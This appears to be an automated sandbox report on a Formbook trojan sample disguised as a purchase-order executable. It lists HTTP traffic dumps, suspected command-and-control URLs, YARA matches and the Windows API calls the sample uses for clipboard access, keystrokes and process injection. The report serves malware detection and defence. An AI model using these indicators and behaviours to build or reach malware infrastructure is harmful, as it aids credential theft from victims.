65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Sep 2024 11:04:57 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Sep 2024 11:05:00 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: CjeBlighAyoJst.exe, 00000006.00000002.3889597488.0000000004BD7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mizuquan.top
            Source: CjeBlighAyoJst.exe, 00000006.00000002.3889597488.0000000004BD7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mizuquan.top/ed2j/
            Source: RMActivate_ssp.exe, 00000004.00000002.3890715735.00000000074EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: RMActivate_ssp.exe, 00000004.00000002.3890715735.00000000074EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: RMActivate_ssp.exe, 00000004.00000002.3888738930.00000000041D2000.00000004.10000000.00040000.00000000.sdmp, CjeBlighAyoJst.exe, 00000006.00000002.3887944910.0000000003622000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: RMActivate_ssp.exe, 00000004.00000002.3890715735.00000000074EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: RMActivate_ssp.exe, 00000004.00000002.3890715735.00000000074EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: RMActivate_ssp.exe, 00000004.00000002.3890715735.00000000074EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: RMActivate_ssp.exe, 00000004.00000002.3890715735.00000000074EB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: RMActivate_ssp.exe, 00000004.00000002.3890715735.00000000074EB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: RMActivate_ssp.exe, 00000004.00000002.3886865804.00000000005A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: RMActivate_ssp.exe, 00000004.00000002.3886865804.00000000005A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: RMActivate_ssp.exe, 00000004.00000002.3886865804.00000000005A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: RMActivate_ssp.exe, 00000004.00000002.3886865804.00000000005A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: RMActivate_ssp.exe, 00000004.00000002.3886865804.00000000005A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: RMActivate_ssp.exe, 00000004.00000002.3886865804.00000000005A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: RMActivate_ssp.exe, 00000004.00000003.2478643383.00000000074C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: RMActivate_ssp.exe, 00000004.00000002.3890715735.00000000074EB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: RMActivate_ssp.exe, 00000004.00000002.3888738930.0000000004040000.00000004.10000000.00040000.00000000.sdmp, CjeBlighAyoJst.exe, 00000006.00000002.3887944910.0000000003490000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.mfgamecompany.shop/lwt6/?OJ=btRp&nR=j/d5AuZ
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00AE7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard | 0_2_00AE7099
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00AE7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard | 0_2_00AE7294
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00AE7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard | 0_2_00AE7099
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00AD4342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput | 0_2_00AD4342
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00AFF5D0 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW | 0_2_00AFF5D0

            E-Banking Fraud

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000002.00000002.2243312339.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3889597488.0000000004B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.3886646848.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.3887684924.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2243639009.00000000039F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.3887626598.00000000006D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2244045785.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.3887789383.0000000003A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2243312339.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3889597488.0000000004B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3886646848.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3887684924.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2243639009.00000000039F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3887626598.00000000006D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2244045785.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3887789383.0000000003A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: initial sample | Static PE information: Filename: Purchase Order TE- 00011-7777.exe
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042C863 NtClose | 2_2_0042C863
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72B60 NtClose,LdrInitializeThunk | 2_2_03B72B60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk | 2_2_03B72DF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B735C0 NtCreateMutant,LdrInitializeThunk | 2_2_03B735C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B74340 NtSetContextThread | 2_2_03B74340
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B74650 NtSuspendThread | 2_2_03B74650
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72BA0 NtEnumerateValueKey | 2_2_03B72BA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72B80 NtQueryInformationFile | 2_2_03B72B80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72BF0 NtAllocateVirtualMemory | 2_2_03B72BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72BE0 NtQueryValueKey | 2_2_03B72BE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72AB0 NtWaitForSingleObject | 2_2_03B72AB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72AF0 NtWriteFile | 2_2_03B72AF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72AD0 NtReadFile | 2_2_03B72AD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72FB0 NtResumeThread | 2_2_03B72FB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72FA0 NtQuerySection | 2_2_03B72FA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72F90 NtProtectVirtualMemory | 2_2_03B72F90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72FE0 NtCreateFile | 2_2_03B72FE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72F30 NtCreateSection | 2_2_03B72F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72F60 NtCreateProcessEx | 2_2_03B72F60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72EA0 NtAdjustPrivilegesToken | 2_2_03B72EA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72E80 NtReadVirtualMemory | 2_2_03B72E80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72EE0 NtQueueApcThread | 2_2_03B72EE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72E30 NtWriteVirtualMemory | 2_2_03B72E30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72DB0 NtEnumerateKey | 2_2_03B72DB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72DD0 NtDelayExecution | 2_2_03B72DD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72D30 NtUnmapViewOfSection | 2_2_03B72D30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72D10 NtMapViewOfSection | 2_2_03B72D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72D00 NtSetInformationFile | 2_2_03B72D00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72CA0 NtQueryInformationToken | 2_2_03B72CA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72CF0 NtOpenProcess | 2_2_03B72CF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72CC0 NtQueryVirtualMemory | 2_2_03B72CC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72C00 NtQueryInformationProcess | 2_2_03B72C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72C70 NtFreeVirtualMemory | 2_2_03B72C70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72C60 NtCreateKey | 2_2_03B72C60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B73090 NtSetValueKey | 2_2_03B73090
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B73010 NtOpenDirectoryObject | 2_2_03B73010
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B739B0 NtGetContextThread | 2_2_03B739B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B73D10 NtOpenProcessToken | 2_2_03B73D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B73D70 NtOpenThread | 2_2_03B73D70
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D34340 NtSetContextThread,LdrInitializeThunk | 4_2_02D34340
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D34650 NtSuspendThread,LdrInitializeThunk | 4_2_02D34650
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D32AD0 NtReadFile,LdrInitializeThunk | 4_2_02D32AD0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D32AF0 NtWriteFile,LdrInitializeThunk | 4_2_02D32AF0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D32BF0 NtAllocateVirtualMemory,LdrInitializeThunk | 4_2_02D32BF0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D32BE0 NtQueryValueKey,LdrInitializeThunk | 4_2_02D32BE0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D32BA0 NtEnumerateValueKey,LdrInitializeThunk | 4_2_02D32BA0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D32B60 NtClose,LdrInitializeThunk | 4_2_02D32B60
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D32EE0 NtQueueApcThread,LdrInitializeThunk | 4_2_02D32EE0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D32E80 NtReadVirtualMemory,LdrInitializeThunk | 4_2_02D32E80
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D32FE0 NtCreateFile,LdrInitializeThunk | 4_2_02D32FE0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D32FB0 NtResumeThread,LdrInitializeThunk | 4_2_02D32FB0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D32F30 NtCreateSection,LdrInitializeThunk | 4_2_02D32F30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D32CA0 NtQueryInformationToken,LdrInitializeThunk | 4_2_02D32CA0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D32C70 NtFreeVirtualMemory,LdrInitializeThunk | 4_2_02D32C70
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D32C60 NtCreateKey,LdrInitializeThunk | 4_2_02D32C60
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D32DD0 NtDelayExecution,LdrInitializeThunk | 4_2_02D32DD0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D32DF0 NtQuerySystemInformation,LdrInitializeThunk | 4_2_02D32DF0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D32D10 NtMapViewOfSection,LdrInitializeThunk | 4_2_02D32D10
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D32D30 NtUnmapViewOfSection,LdrInitializeThunk | 4_2_02D32D30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D335C0 NtCreateMutant,LdrInitializeThunk | 4_2_02D335C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D339B0 NtGetContextThread,LdrInitializeThunk | 4_2_02D339B0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D32AB0 NtWaitForSingleObject | 4_2_02D32AB0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D32B80 NtQueryInformationFile | 4_2_02D32B80
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D32EA0 NtAdjustPrivilegesToken | 4_2_02D32EA0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D32E30 NtWriteVirtualMemory | 4_2_02D32E30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D32F90 NtProtectVirtualMemory | 4_2_02D32F90
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D32FA0 NtQuerySection | 4_2_02D32FA0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D32F60 NtCreateProcessEx | 4_2_02D32F60
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D32CC0 NtQueryVirtualMemory | 4_2_02D32CC0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D32CF0 NtOpenProcess | 4_2_02D32CF0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D32C00 NtQueryInformationProcess | 4_2_02D32C00
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D32DB0 NtEnumerateKey | 4_2_02D32DB0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D32D00 NtSetInformationFile | 4_2_02D32D00
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D33090 NtSetValueKey | 4_2_02D33090
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D33010 NtOpenDirectoryObject | 4_2_02D33010
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D33D70 NtOpenThread | 4_2_02D33D70
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02D33D10 NtOpenProcessToken | 4_2_02D33D10
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_00149020 NtDeleteFile | 4_2_00149020
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_001490C0 NtClose | 4_2_001490C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_00149220 NtAllocateVirtualMemory | 4_2_00149220
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_00148DD0 NtCreateFile | 4_2_00148DD0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_00148F30 NtReadFile | 4_2_00148F30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_0094F13A NtQueryInformationProcess | 4_2_0094F13A
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00AD70AE: CreateFileW,DeviceIoControl,CloseHandle | 0_2_00AD70AE
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00ACB9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock | 0_2_00ACB9F1
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00AD82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState | 0_2_00AD82D0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02CF2FC84_2_02CF2FC8
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D0CFE04_2_02D0CFE0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D7EFA04_2_02D7EFA0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D74F404_2_02D74F40
